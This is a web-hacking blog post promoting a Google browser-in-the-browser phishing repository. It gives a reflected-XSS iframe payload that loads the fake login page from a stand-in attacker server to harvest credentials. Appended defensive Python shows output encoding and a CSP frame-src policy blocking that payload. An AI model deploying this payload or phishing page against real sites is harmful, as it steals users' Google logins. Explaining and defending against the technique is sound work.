Week 21 - Google BITB
For week 21 of the web hacking series, I was looking to improve upon the GooglePhishing repository I made last week. I saw some of your comments/messages regarding using it with a Browser-in-the-Browser (BITB) attack. I thought this would allow for a super convincing phishing attack, so I did some research and built it out:
https://github.com/jakedmurphy1/GoogleBITB
I think this is one of the most convincing techniques I’ve seen in recent years. Definitely tricky if you are not paying close attention or familiar with web technologies.
Additionally, I discovered a pretty cool attack vector using BITB. You can inject the below Cross-Site Scripting payload into an application:
“><iframe style='border:none;width:100%;height:100%' scrolling='no' src='https://[ATTACKER_SERVER]/GoogleBITB/index.html'/>
And as long as the attacker server uses HTTPS, it will successfully render the iframe within an iframe (inception) and prompt the user to log in to the Google popup, appearing to be from the vulnerable application. This technique can allow you to harvest credentials with just a reflected XSS attack!
This goes to show the dangers of allowing XSS within your application, and the importance of thorough pentesting.
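As an added defensive example (not part of the original post or the GoogleBITB repository), the Python below renders a hypothetical reflected search parameter two ways: verbatim, where the iframe payload above breaks out of the attribute, and hardened with HTML encoding plus a Content-Security-Policy whose frame-src forbids embedding third-party origins. The route, template and header values are assumptions, and the CSP checker is a simplified model of the browser's frame-src fallback chain.

```python
import html
from dataclasses import dataclass, field

# Constructed sample input: the iframe-injection value from the post, as it
# would arrive in a reflected parameter such as ?q=...
INJECTED_VALUE = (
    '">' + "<iframe style='border:none;width:100%;height:100%' scrolling='no' "
    "src='https://[ATTACKER_SERVER]/GoogleBITB/index.html'/>"
)

@dataclass
class Response:
    body: str
    headers: dict = field(default_factory=dict)

# Hypothetical page that reflects the search term back into an attribute.
TEMPLATE = '<form><input type="search" name="q" value="{q}"></form>'

def render_vulnerable(q: str) -> Response:
    # Reflects the parameter verbatim: the leading '">' closes the attribute
    # and the tag, so the rest of the value is parsed as new markup.
    return Response(body=TEMPLATE.format(q=q))

def render_hardened(q: str) -> Response:
    # 1. Context-aware output encoding: & < > " ' become entities, so the
    #    value can never leave the attribute it was placed in.
    safe_q = html.escape(q, quote=True)
    # 2. Defence in depth: frame-src limits which origins this page may embed,
    #    so a missed injection still cannot load a third-party frame.
    #    (X-Frame-Options only controls who may frame *this* page, which is
    #    the wrong direction for this vector.)
    headers = {"Content-Security-Policy":
               "default-src 'self'; frame-src 'none'; object-src 'none'"}
    return Response(body=TEMPLATE.format(q=safe_q), headers=headers)

def contains_injected_frame(body: str) -> bool:
    # Did a real <iframe> tag survive rendering?
    return "<iframe" in body.lower()

def csp_allows_frame(headers: dict, origin: str) -> bool:
    # Simplified model of the CSP fallback chain for frames:
    # frame-src -> child-src -> default-src; no policy means allow all.
    # 'self' matching is omitted: third-party origins are what matter here.
    policy = headers.get("Content-Security-Policy")
    if policy is None:
        return True
    directives = {}
    for part in policy.split(";"):
        tokens = part.split()
        if tokens:
            directives[tokens[0].lower()] = tokens[1:]
    for name in ("frame-src", "child-src", "default-src"):
        if name in directives:
            sources = directives[name]
            return "'none'" not in sources and (origin in sources or "*" in sources)
    return True
```

Running both renderers over INJECTED_VALUE shows the difference: the vulnerable body contains a live iframe tag, while the hardened body carries only the entity-encoded text and a policy that would refuse the frame even if encoding were missed.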